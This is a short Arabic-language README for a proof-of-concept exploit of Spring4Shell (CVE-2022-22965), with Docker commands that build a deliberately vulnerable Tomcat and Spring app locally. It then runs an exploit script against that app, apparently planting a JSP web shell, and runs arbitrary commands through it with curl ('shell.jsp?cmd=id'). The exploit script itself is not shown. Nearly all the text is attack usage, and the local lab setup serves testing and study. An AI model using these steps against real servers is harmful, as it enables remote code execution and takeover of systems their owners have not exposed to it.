
إثبات المفهوم واستغلال لـ CVE-2022-22965 Spring4Shell
إثبات المفهوم (PoC) لثغرة Spring4Shell (CVE-2022-22965) مع خادم Tomcat ضعيف وتطبيق Spring4Shell ضعيف.
docker build . -t spring4shell
docker run -p 80:8080 spring4shell
يمكنك أيضًا تشغيلها مع فتح منفذ المصحح إذا لزم الأمر:
docker run -p 80:8080 –p 5005:5005 spring4shell
راجع المنشور الأصلي على المدونة للحصول على تفاصيل إعداد مصحح عن بُعد في IntelliJ Idea!
./exploit.sh --url http://localhost/spring4shell/hello --dir spring4shell
ثم يمكنك تشغيل أي أمر عن بُعد بهذه الطريقة:
curl http://localhost/spring4shell/shell.jsp?cmd=id --output -
...أو عبر زيارة الرابط أعلاه.